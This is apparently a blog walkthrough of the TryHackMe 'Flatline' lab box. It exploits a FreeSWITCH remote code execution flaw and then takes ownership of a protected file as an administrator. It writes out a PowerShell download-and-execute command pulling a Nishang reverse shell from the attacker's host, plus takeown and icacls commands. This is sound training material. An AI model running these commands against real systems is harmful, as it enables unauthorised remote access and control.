Flatline TryHackMe Walkthrough

Hello guys back again with another walkthrough. This time we’ll be tackling flatline from TryHackMe. The box was created by a user called Nekrotic. And the box is a really great for beginners who find it difficult in tackling widows boxes. It has just two steps from the initial foothold to getting root flag on the box. The box starts of by finding an open port 8021 running FreeSWITCH and on doing a little bit of googling we find that the service is vulnerable to remote code execution. After gaining a shell on the box we realize that we are already administrators on the box but we cannot read the root flag. we will use to windows commands to change the file ownership and read the root flag and the box is done. It was a really amazing box and without much say lets jump in

As always we’ll start off with a nmap scan of the box to find the ports that are open. Looking at the screenshot below we see that we have two open ports namely

  1. Remote desktop running on port 3389
  2. FreeSWITCH running on port 8021

Remote desktop (RDP) requires us to have valid credentials for us to access and right now we don’t even have a valid username for an account that exists on the box. Hence I decided to first begin by enumerating port 8021 running FreeSWITCH service. Doing a little google research we find a python exploit for that particular service

I downloaded the exploit and run it

The exploit required me to specify an IP Address and a command to be run after we connect to the service. First I tried pinging myself to see if actually the exploit would work. You might be asking why I didn’t try to get a reverse shell immediately and the reason is, a reverse shell may or may not work. Some systems are heavily guarded making reverse shells not to work and I could end up assuming that the exploit didn’t work because the service isn’t vulnerable but the reason might have been that the system was protected against getting reverse shells. A ping isn’t always considered malicious and hence there’s no reason it should be blocked

Hence next I specified a target and a command to run which in my case was a ping. On my box I did set up tcpdump to listen for any incoming ICMP packets

After running the exploit I got a ping request on my tcpsump listener

This confirms that the service is vulnerable to a remote code execution. The next step naturally is getting a shell on the system. What a shell will enable us to do is run system commands though the exploited service. I used nishang reverse shell since they are easy to use. On a fresh install of kali am not sure if nishang is installed by default if not just run the command

sudo apt install nishang

To install nishang on your system.

Next I copied nishang’s reverse shell file Invoke-PowerShellTcp.ps1 to my current working directory and made a few modifications

I changed the filename to be something a bit shorter shell.ps1

Next i added the following one liner at the bottom of the reverse shell

Invoke-PowerShellTcp -Reverse -IPAddress 10.8.2.58 -Port 9001

Basically what I added was just my IP address and the port which I would use to listen for an incoming shell connection

I saved the reverse shell and started the a netcat listener and also a python we server

Then I executed the payload using the command below

The command that i ran was

python3 exploit.py 10.10.151.163 "cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://10.8.2.58:8000/shell.ps1')"

Going back to my netcat listener we had a shell on the box.

Sweet!!!. The next step is reading the user flag on the box

You can now submit it and get the points. There is a also a root.txt on the same folder. But when I tried receding it I got an access denied

The next steps is perform a privilege escalation. I downloaded winpeas to the box and ran it and found out that i was already an administrator since I was in the administrator’s group

I also found a NetNTLMv2 hash for the user Nekrotic

I tried cracking it with hashcat but it did not work. Being in the administrators group means we have access to all files. I decided to look online on how to take full ownership of a file I did not have access to and found a really nice article

We’ll use the two commands below to gain access to the root file

takeown /R /F *.*
icacls "root.txt" /q /c /t /grant Users:F

And now trying to read the root flag using the cat command in windows PowerShell it works we have the flag and can submit for the points

We can submit the flag and get the full points of the box. And the box is pretty much done. I hoped you enjoyed the box if so clap for me down below and don’t forget to follow me for any upcoming walkthroughs

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store